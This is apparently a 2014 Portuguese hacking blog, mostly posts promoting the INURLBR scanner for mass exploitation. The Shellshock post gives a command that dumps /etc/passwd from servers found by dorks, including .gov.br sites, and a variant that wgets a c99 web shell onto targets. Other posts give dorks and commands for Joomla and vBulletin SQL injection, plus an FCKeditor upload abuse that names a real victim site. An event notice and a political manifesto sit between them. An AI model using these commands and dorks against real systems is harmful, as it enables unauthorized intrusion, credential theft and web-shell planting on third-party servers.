terça-feira, 30 de setembro de 2014

SCANNER [ INURL BR ] + [ SHELLSHOCK ] - Exploit em massa



Eae cybers vândalos, a galera que trabalha na área de tecnologia com certeza já ouviu falar na nova vulnerabilidade que saiu "Shellshock". para mais informações sobre a falha clique no link.

 Vamos para o que importa, nossa equipe montou uma linha de comando para ser usando com nosso scanner ( SCANNER INURL BR ) para explorar essa vulnerabilidade em massa.

[ Dorks ]

DORK[0]=> site:gov.br inurl:/cgi-sys/defaultwebpage.cgi
DORK[1]=> site:.br inurl:/cgi-sys/defaultwebpage.cgi


Lista de dorks CGI ( Créditos pela lista "Takedown" )
 http://pastebin.com/7aD2uZR3 

[ 0xComando ]

php inurlbrazil.php --dork 'inurl:/cgi-sys/defaultwebpage.cgi & inurl:defaultwebpage.cgi ext:cgi' -s ../cgi.txt3 --comand-all 'curl -A "() { :;}; /bin/cat /etc/passwd > ~/cgi-sys/inurlbr.txt" http://_TARGET_/cgi-sys/defaultwebpage.cgi;curl http://_TARGET_/cgi-sys/inurlbr.txt'

  Explicação do comando:
  "--comand-all 'curl -A "() { :;}; /bin/cat /etc/passwd > ~/cgi-sys/inurlbr.txt" http://_TARGET_/cgi-sys/defaultwebpage.cgi;curl http://_TARGET_/cgi-sys/inurlbr.txt'"

No parâmetro --comand-all ele define o exploit que vai ser usado nas url que o scanner listo, que executa o comando "cat /etc/passwd" que vai jogar todas as senhas do servidor no arquivo "~/cgi-sys/inurlbr.txt" depois ele executa o curl "curl http://_TARGET_/cgi-sys/inurlbr.txt'" para fazer a leitura do arquivo inserido!


[ Variação de comando ] 
 curl -A "() { :; }; wget http://site/c99.txt;mv c99.txt c.php" http://_TARGET_/cgi-sys/defaultwebpage.cgi
 
Você pode variar o comando do exploit para se adaptar a sua vontade ou exploração.


Demo:


quarta-feira, 24 de setembro de 2014

Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP)

Co0L BSidesSP

A Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) é uma mini-conferência sobre segurança da informação organizada por profissionais de mercado com o apoio do Garoa Hacker Clube com o objetivo de promover a inovação, discussão e a troca de conhecimento entre os participantes e divulgar os valores positivos e inovadores da cultura hacker.

A Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) é uma mini-conferência sobre segurança da informação organizada por profissionais de mercado com o apoio do Garoa Hacker Clube com o objetivo de promover a inovação, discussão e a troca de conhecimento entre os participantes e divulgar os valores positivos e inovadores da cultura hacker.

A Co0L BSidesSP é um evento gratuito que faz parte das conferências “Security B-Sides” existentes em mais de 60 cidades de onze países diferentes, que são mini-conferências voltadas para a comunidade. A C0oL BSidesSP pretende oferecer atividades que promovam a segurança da informação e a cultura hacker, com diversas atividades programadas para acontecer simultaneamente, incluindo duas trilhas de palestras técnicas, debates, oficinas e um “Churrascker”.

A décima edição da conferência ocorrerá no dia 23 de Novembro de 2014 (domingo) , no final de semana anterior a conferência BlackHat Summit São Paulo, uma das mais importantes conferências de segurança brasileiras.

A Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) ocorrerá no domingo, dia 23 de Novembro de 2014, aproveitando o final de semana que antecede a conferência BlackHat Summit São Paulo.
Neste dia terá várias atividades em paralelo, incluindo:

  • Duas trilhas de palestras técnicas
  • Várias oficinas simultâneas
  • Diversas competições no Capture The Flag (CTF)
  • Atividades diversas para fortalecer a comunidade, como a "Hacker Job Fair" e a Brazilian Arsenal
  • Palestras Relâmpago (Lightning Talks)
  • A BSidesSP 4 Kids, com atividades para crianças e adolescentes
  • Sala de descompressão, com lojinhas
  • “Churrascker” gratuito para os presentes.

As palestras terão 40 minutos de duração com 10 minutos para perguntas e respostas e para permitir a movimentação do pessoal. As oficinas serão práticas (hands-on), com 1h30 de duração cada uma.

No brasil já aconteceu varias edições do Security BSides 

  1. May 6, 2012 - Co0L BSidesSP (Sao Paulo) 
  2. October 21, 2012 - BSidesSP (parallel with Hackers to Hackers)
  3. May 19, 2013 - BSidesSP (parallel with You Sh0t the Sheriff)
  4. October 6, 2013 - BSidesSP (parallel with Hackers to Hackers)
  5. November 24, 2013 - BSidesSP (Before BH)
  6. April 13, 2014 - BSidesSP (preceding You Sh0t the Sheriff)
  7. June 15, 2014 - BSidesSP (WorldCup Edition)
  8. November 25-26, 2014 - BSidesSP (before Black Hat)

Projeto interessantes também vinculados ao evento.

0xHacker Job Fair


A "Hacker Job Fair" é uma iniciativa da Co0L BSidesSP para aproximar a comunidade de estudantes e profissionais com o mercado de trabalho, abrindo a oportunidade para discussão sobre carreira e desenvolvimento profissional com empresas e faculdades.

0xBrazilian Arsenal


O "Brazilian Arsenal" é um espaço para divulgar os projetos de ferramentas de segurança open source desenvolvidas por brasileiros, com objetivo de apoiar estas iniciativas, fomentar o uso destas ferramentas e atrair mais voluntários para ajudá-los.


Mais detalhes sobre o evento:
https://www.garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_10
http://www.securitybsides.com/w/page/82545220/BSidesSaoPaulo_Nov2014

Twitter profile: @BSidesSP
Youtube: https://www.youtube.com/user/bsides2013/videos

sexta-feira, 19 de setembro de 2014

SCANNER INURLBR + Exploit Vulnerability Joomla Plugin Calendar

0xSCAN + EXPLOIT

SCANNER INURLBR + Exploit Vulnerability Joomla Plugin Calendar

----------------------------------------------------------------------------------------------------------

0x[+] Exploit Title : Joomla Spider Calendar <= 3.2.6 SQL Injection
0x[+] Exploit Author : Claudio Viviani
0x[+] Vendor Homepage : http://web-dorado.com/
0x[+] Software: http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329

Date : 2014-08-31
0x[+] Tested on : Windows 7 / Mozilla Firefox
                              Linux / Mozilla Firefox

------------------------------------------------------------------------------------------------

0xDORK[0]: inurl:option=com_spidercalendar
0xDORK[1]: intext:com_spidercalendar & intext:"index of"
0xDORK[2]: inurl:php & inurl:com_spidercalendar

0xVÍDEO[0]


0xVÍDEO[1]



0xCOMANDO INURLBR EXEMPLO={

./inurlbr.php --dork 'inurl:index.php?option=com_spidercalendar' -s joomla.txt -q 1,6 -t 3 --exploit-get "/index.php?option=com_spidercalendar&calendar_id=1'0x27" --command-vul "python exploit/Joomla/joomla-calendar.py -H http://_TARGET_/"


}


0xSCRIPT INURLBR =  {

https://github.com/googleinurl/SCANNER-INURLBR

}

0xEXPLOIT Joomla Plugin Calendar = {

http://1337day.com/exploit/22603

}

segunda-feira, 15 de setembro de 2014

VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP


VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP

INURLBR Utilizando frameworks de comandos externos


Este tutorial mostra a utilização do SCANNER inurlbr.php
em conjunto com frameworks-scripts de comandos externos ...
usando a flag [--comand-vul] e uma dork para encontrar sql relacionado
vuls ou coleta de informações utilizando framework nmap ...

Este tutorial irá focar em mostrar como o nmap e SqlMap
pode ser usado em conjunto com o SCANNER  inurlbr.php ...
Para mais informações sobre inurlbr sintaxe e como usar o SCANNER
[PHP inurlbr.php --help]

ASSISTA:



Scanner-INURLBR repository: https://github.com/googleinurl/SCANNER-INURLBR

Exploit HTMLEditor e dorks upload de arquivos

Explorando HTMLEditor 

Explorando HTMLEditor


DORK[0]=> inurl:/HTMLEditor/editor/
DORK[1]=> inurl:/HTMLEditor/editor//filemanager/
DORK[2]=> inurl:/HTMLEditor/editor//filemanager//connectors/
DORK[3]=> inurl:HTMLEditor & "Index of"
DORK[4]=> inurl:"connectors/uploadtest.html" & "Index of"
DORK[5]=> inurl:"/editor/filemanager/" ext:html
DORK[6]=> inurl:"/filemanager/" "Resource Type"


http://www.target.com/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or
http://www.target.com/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Mude o conectar para PHP ele vai efetuar o upload.

Mude o conectar para PHP ele vai efetuar o upload.

Suporte de arquivos: TXT e JPG em algums sites você pode fazer upload HTML e PHP demais.

O arquivo upado pode ser encontrado em:


http://www.target.com/PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
 or
http://www.target.com/patch//PowerCMS%20folder/files/SEU_ARQUIVO.ALVO

Ex:
http://thymeoncavill.com.au/CMS/HTMLEditor/editor/filemanager/connectors/uploadtest.html
UPLOAD=>
http://thymeoncavill.com.au/CMS/files/10487462_686112868144329_1233575004575245355_n.jpg


Exemplo de uso SCANNER INURLBR

COMANDO=>{

./inurlbr.php --dork 'inurl:"/filemanager/" "Resource Type"' -q 1,6 -s fkeditor.txt -t 2 --replace='/filemanager/[INURL]/filemanager/connectors/uploadtest.html?' -a 'FCKeditor - Uploaders Tests'

}

Resultado:


Exemplo de uso SCANNER INURLBR


sábado, 13 de setembro de 2014

0xHacking Antifascista

Hack (do verbo Inglês "to hack", que significa "cortar")1 é um termo que refere-se à reconfiguração ou reprogramação de um sistema de função de forma que não autorizada pelo proprietário, administrador ou designer. O termo tem vários significados relacionados com a tecnologia e ciência de computação: pode se referir a uma correção ou melhoria rápida e inteligente de um problema de programa de computado.  Hack ou hacking antes de tudo é uma ideologia de união na internet, Cogido livre, Acesso a informação e combate direto contra governo e seus meios de censura web.


Hack (do verbo Inglês "to hack", que significa "cortar")1 é um termo que refere-se à reconfiguração ou reprogramação de um sistema de função de forma que não autorizada pelo proprietário, administrador ou designer. O termo tem vários significados relacionados com a tecnologia e ciência de computação: pode se referir a uma correção ou melhoria rápida e inteligente de um problema de programa de computado.

Hack ou hacking antes de tudo é uma ideologia de união na internet,
Cogido livre, Acesso a informação e combate direto contra governo e seus meios de censura web.

- Hacking vai além do deface e um By meunome.
- Hacking é subversão.
- Hacking é compartilhamento livre do conhecimento.

Foi dessa ideologia que surgiu o Cypherpunk onde seu principal objetivo é usar criptografia como arma.

Com o grande poder que hoje é contido na internet governos, grupos fascistas, pedófilos, religiosos extremistas entre outros círculos de "cidadãos de bem" tem alastrado-se igual um worms, propagando ameças, comentários racistas & machistas entre os outros de extremismos conservador.

Uma pesquisa rápida no Facebook/Google podemos encontrar desde paginas que propagam racismo a pages propagam ideias de estupros que caracterizam a mulher como ser inferior.

Então fica uma dica pra quem está querendo conhecer o mundo hacking ou que já está nele.
- Hacking é subversão e não cooperação com sistema.
- Hacking é ação direta contra grupos de repressão,censura ou que propagam ódio, E não o site da padaria pra por no seu ZONE-H.

De todos para todos:

Neither war between hackers, nor peace for the system.
Devemos combater o fascismo dentro e fora da internet.

Conheça um pouco do Antifascismo 

# Antifascismo -

Luta absoluta contra o fascismo, nazismo, golpismo, capitalismo, racismo, machismo, homofobia, transfobia, xenofobia e todos os extremismos conservadores que estão inseridos na sociedade através de discursos tendenciosos.

# Como surgiu -

A Ação Antifascista nasceu da união entre os anarquistas e os comunistas tendo um único inimigo em comum: o fascismo. Essa união se deu não através de idealizações políticas em grupos com características próprias mas, sim através da realidade cotidiana ao analisar a sociedade e perceber o risco eminente de uma extrema-direita forte, com poderes institucionais ou militares.
Como a história nos mostra, esses totalitarismos políticos/ideológicos são um risco a liberdade de expressão cultural e social, por isso é de total importância a formação de um movimento unido contra esses grupos intolerantes que almejam o poder político dentro de nossas cidades.
O nazismo e outros regimes totalitários demonstraram uma necessidade urgente de colocar dentro do nosso cotidiano uma cultura antifascista, negando, desse modo, qualquer valor que incentive o fundamentalismo/dogmatismo.
A tendência antifascista é libertária, pois, se coloca contrária aos sectarismos dos grupos que combatemos, ou seja, todos que compartilham das mesmas ideias são bem-vindos.
Todos que desejam levantar a bandeira da luta antifascista devem abandonar posturas machistas, sexistas, transfobicas, homofóbicas, misógenas, xenofobicas, extremismos religiosos/ideológicos, nacionalismos e tudo aquilo que não tenha coerência com o histórico de luta da Ação Antifascista em todos os seus anos de combate a opressão tanto da sociedade como do sistema.

# Métodos -
Ação Direta.

A ação direta sempre foi uma das principais características da luta antifascista, surgindo como uma resposta agressiva a intolerância da extrema-direita. Conhecendo a realidade das ruas, sabemos que existem grupos que perseguem e utilizam da violência para coagir todos aqueles que são contrários ao seu modelo de sociedade perfeita. White Powers (nazistas), carecas (nacionalistas), integralistas entre outros, espalham discursos de ódio utilizando o medo para atingir seus objetivos. Por este motivo, a autodefesa é algo de extrema importância para nossa integridade física meio a uma ameaça de agressão, afinal, com esses militantes não existe o diálogo.
Por compreender a importância de uma linha de frente forte contra esses grupos nas ruas, muitos Antifas organizam grupos autônomos em suas regiões e combatem o fascismo de forma mais exaltada e prática. O objetivo é fazer os radicais da extrema-direita retrocederem em suas perseguições a pessoas desprotegidas e limpar regiões de grupos extremistas que possam vir a agredir outras pessoas. Esses grupos Antifas atuam de forma descentralizada e sem lideranças; respondem às necessidades dos respectivos lugares que residem; carregam características próprias ideologicamente e culturalmente falando, porém com um objetivo em comum: lutar contra o fascismo.

Conhecimento.

Estudar é importante principalmente para você não se tornar aquilo que combate, para saber criticar aquilo que se critica e o por que de criticar. Talvez esse seja o principal método de se combater o fascismo e seus adjetivos. Conhecer, entender e refletir é o caminho mais seguro para uma consciência tranquila.
Não tenha preguiça! Leia...

Intervenção.

A intervenção é outra ação importante dentro do antifascismo, através dela fortalecemos a oposição ao fascismo.
A arte sempre foi ligada ao movimento antifascista pois com ela podemos passar mensagens muito mais profundas, ela fortalece a reflexão,
utilizamos a subversão no lugar da doutrinação.
Posters colados nas ruas, stencils, grafites, tudo aquilo que for divulgar o movimento é de extrema importância. Quanto mais mostrarmos que estamos nas ruas, mais intimidaremos os grupos que combatemos e instigaremos a curiosidade das pessoas a respeito do assunto.

Mobilização popular.

Organizar movimentos e atos contra políticas e grupos conservadores que tentem se levantar como alternativa é de extrema necessidade, lembrando que um antifascista nunca impõe seu ideal e sim o defende! Todos devem estar dispostos a se unir nas ruas contra qualquer ameaça fascista que venha surgir.

# Organização -

A ação antifascista nunca foi um movimento de unidade e institucionalizado, ela mantém-se descentralizada e totalmente autônoma.
Existem diversos grupos e coletivos antifascistas que atuam em combate ao fascismo. Não existem lideranças nem hierarquias.
Cada célula tem seus critérios e métodos de ação, e tem total liberdade para militar da forma que acharem mais conveniente, sempre visando a coerência da bandeira Antifa.

# Objetivos - 

Jamais deixar movimentos totalitários crescerem em nossas cidades, combater grupos que utilizam da violência para espalhar intolerância, fortalecer seu local Antifa e ser solidário aos camaradas de luta.

Qualquer duvida nos mande mensagem via inbox.

Antifa Unida!
Nunca dividida!

https://www.facebook.com/AntifascistaBrasil/photos/pb.414425795343798.-2207520000.1410638585./609259885860387/?type=3&theater

https://pt.wikipedia.org/wiki/Cypherpunk

quinta-feira, 4 de setembro de 2014

FALHA! Injeção de SQL em vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 e 5.1.2 (Exploit + Vídeo)

vBulletin é um software desenvolvido por vBulletin Solutions, para a criação e manutenção de fóruns na Internet. Ele é baseado em PHP e MySQL e segundo a empresa mais de 100.000 sites funcionam sob este sistema.



vBulletin é um software desenvolvido por vBulletin Solutions, para a criação e manutenção de fóruns na Internet. Ele é baseado em PHP e MySQL e segundo a empresa mais de 100.000 sites funcionam sob este sistema.

Segundo vBulletin que confirma o problema afeta as versões 5.0.4, 5.0.5, 5.1.0, 5.1.1 e 5.1.2. O grupo romeno Romanian Security Team (RST) postou um vídeo que mostra a vulnerabilidade e confirma o relatório para vBulletin, que irá fornecer todos os detalhes após o lançamento do patch.

A vulnerabilidade permite que um atacante realize ataques de injeção SQL no banco de dados, com todas as implicações que isso pode trazer. Ou seja, extrair todas as informações e conteúdo do banco de dados, e até mesmo de lá comprometer todo o sistema.

Tal façanha foi publicado e nos permite obter a versão, nome de usuário e banco de dados para obter detalhes mais suculentos deve modificar o exploit:

Vídeo demostrativo=>




Usando exploit=> http://pastebin.com/hb2adMn6
php exploit.php {target}
Ex: php exploit.php http://forum.teste.com.br

DORK[0]=> "Powered by vBulletin® Version 5.1.2"
DORK[1]=> "Powered by vBulletin® Version 5.0.4"
DORK[2]=> "Powered by vBulletin® Version 5.0.5"
DORK[3]=> "Powered by vBulletin® Version 5.1.0"
DORK[4]=> "Powered by vBulletin® Version 5.1.1"
DORK[5]=> site:com intext:"5.0.4" & "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org


Com base no exploit feito pela Romanian Security Team fizemos o nosso voltado para o ferramenta INURLBR, tal exploit será disponibilizado junto com próxima versão do scanner, mas nada impede de usar com o scan script feito pela (RST).

Comando INURLBR=>
./inurlbr.php --dork 'site:com intext:"5.0.4" "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org -site:forumrunner.com' -s vBulletin.txt -q 6 -t 1 --comand-all 'php exploitvBulltin.php http://_TARGET_'

Demostrativo=>
Com base no exploit feito pela Romanian Security Team fizemos o nosso voltado para o scanner INURLBR, tal exploit será disponibilizado junto com próxima versão do scanner.


Fontes=>{

[+] http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html
[+] http://unaaldia.hispasec.com/2014/07/inyeccion-sql-en-el-gestor-de-foros.html
[+] http://packetstormsecurity.com/files/127537/vBulletin-5.1.2-SQL-Injection.html
[+] http://1337day.com/exploits/22452

}

segunda-feira, 1 de setembro de 2014

Projeto VLOG - Chmod777

Um dos primeiros canais brasileiro que vai abordar tema tecnologia e segurança da informação. Criado pelo nosso amigo @unknownantisec.  Com grande prazer aparecemos nesse projeto, Danilo Vaz/unknownantisec fala sobre nossa ferramenta SCANNER INURLBR que utiliza motores de busca para achar possíveis vulneráveis web.

Um dos primeiros canais brasileiro que vai abordar tema tecnologia e segurança da informação.
Criado pelo nosso amigo @unknownantisec.

Com grande prazer aparecemos nesse projeto em sua estreia, Danilo Vaz/unknownantisec fala sobre nossa ferramenta SCANNER INURLBR que utiliza motores de busca para achar possíveis vulneráveis web.

0x02 - Scanner de DORK e Post sobre MiniDOM



Blog=> http://unknownsec.wordpress.com
Canal Youtube Chmod777 => https://www.youtube.com/channel/UCIFnNrMA0SvXeUWY3xXag2A
SCRIPT INURLBR=> https://github.com/googleinurl/SCANNER-INURLBR